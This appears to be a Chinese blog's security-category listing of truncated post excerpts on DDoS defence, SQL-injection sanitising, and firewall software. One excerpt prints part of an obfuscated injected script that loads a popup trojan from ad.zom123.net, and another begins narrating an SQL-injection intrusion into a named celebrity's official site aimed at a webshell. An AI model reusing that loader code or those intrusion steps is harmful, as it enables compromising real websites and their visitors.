百度backend_entrance_discovered安全漏洞

评论(0)浏览(285)分类:黑客技术
百度backend_entrance_discovered安全漏洞  昨天申请百度oauth第三登陆网站功能,新建应用填写的网址报backend_entrance_discovered安全漏洞,不给通过。  真的是无力吐槽了。。说登陆地址/admin/login.html有backend_entrance_discovered安全漏洞,老子的管理后台又不是/admin/login.html这个地址,这个地址是给注册用户用的,没得办法,只好修改用户登陆地址再次提交审核了。  b..

防sql注入参数处理要点

评论(0)浏览(139)分类:黑客技术
防sql注入参数处理要点  下面的示例代码以VBScript为例,介绍防sql注入参数处理要点,只要在操作数据之前,按照下面的步骤对客户端提交的参数进行验证,一般不会出现sql注入问题,最多是脚本出错,在cint语句那里读数据库,使用连接字符串构成sql语句的,需要执行下面的操作  1)如果参数为字符串,将'替换掉xx=replace(request(xx),',)  2)如果参数为..

防ddos攻击防火墙推荐

评论(0)浏览(154)分类:黑客技术
防ddos攻击防火墙推荐  推荐一款防ddos攻击的防火墙,可以防syn,ack,udp,icmp,cc攻击,效果还不错的。因为这3天公司服务器一直被一个垃圾流氓ddos,是udpflood流量攻击,平均流量流入流出15M左右的流量,在安装了这个冰盾防火墙后,响应流量没有了,流入的总流量和机房限制的带宽持平,网站总算是可以打开了,虽然还是有点慢。然后过一段时间以后就没再攻击了,..

CC攻击症状

评论(0)浏览(111)分类:黑客技术
CC攻击症状 CC攻击是DDoS(分布式拒绝服务)的一种,相比其它的DDoS攻击CC似乎更有技术含量一些。这种攻击你见不到虚假IP,见不到特别大的异常流量,但造成服务器无法进行正常连接,一条ADSL的普通用户足以挂掉一台高性能的Web服务器。由此可见其危害性,称其为Web杀手毫不为过。最让站长们忧虑的是这种攻击技术含量不是很高,利用工具和一些IP代理,一个初、..

冰盾DDoS防火墙介绍

评论(0)浏览(227)分类:黑客技术
冰盾DDoS防火墙介绍软件名称:冰盾DDoS防火墙(国庆60年特别版)V9.3 Build 90923发布日期:2009年9月23日软件大小:1.77MB下载地址:http://www.bingdun.com/bdfwsetup.exe软件语言:中文软件类别:国产软件/服务器类或防火墙类软件性质:免费正式版应用平台:Win2000/2003开发厂商:北京补天信息科技有限公司官方网站:http://www.bindun.com软件介绍:一、【冰盾简..

悲剧,translate.google.cn也被墙了

评论(0)浏览(1111)分类:黑客技术
悲剧,translate.google.cn也被墙了  今天使用translate.google.cn进行翻译的时候,发现好久没反应,然后一刷新页面,尽然出现下面的错误连接被重置 载入页面时到服务器的连接被重置。 * 此站点暂时不可用或者太忙。请稍后重试。 * 如果您无法载入任何页面,请检查您计算机的网络连接。 * 如果您的计算机受到防火墙或代理服务器的保护,请确认 Firefox 被授权访问网页。  等了..

ad.zom123.net弹窗木马

评论(0)浏览(200)分类:黑客技术
ad.zom123.net弹窗木马  最近看到朋友的网站第一次访问的时候会转向到ad.zom123.net这个网址,然后弹窗窗口,还以为我电脑中病毒了,后面在网上查找好像有很多都有ad.zom123.net这个问题。  出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码+展开-JavaScriptdocument.write('sc'+'riptsrc="\/sc'+'ript'"http://%61d'+'.%7ao'+'m..

JS/Exploit-DialogArg.gen特洛伊木马程序

评论(0)浏览(132)分类:JavaScript/Ajax开发技巧
JS/Exploit-DialogArg.gen特洛伊木马程序  搞幽啊,showModalDialog {url:} 放在script标签之间竟然变成了JS/Exploit-DialogArg.gen特洛伊木马程序,被麦咖啡给杀掉了,O(∩_∩)O哈哈~  如果你的电脑安装有麦咖啡,只要将下面的内容保存在文本类型的文件里面,如.txt,.aspx..jsp等等里面,就会被识别为JS/Exploit-DialogArg.gen特洛伊木马程序,然后杀掉,script标签之间的js代码全..

检测周杰伦官方网站

评论(0)浏览(124)分类:黑客技术
检测周杰伦官方网站文章作者:风流倜傥某日在cn群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。看注射点,老规矩,先提交个单引号,返回错误提示是You have an error in your SQL syntax; check the manual that corresponds to your MySQL server versio..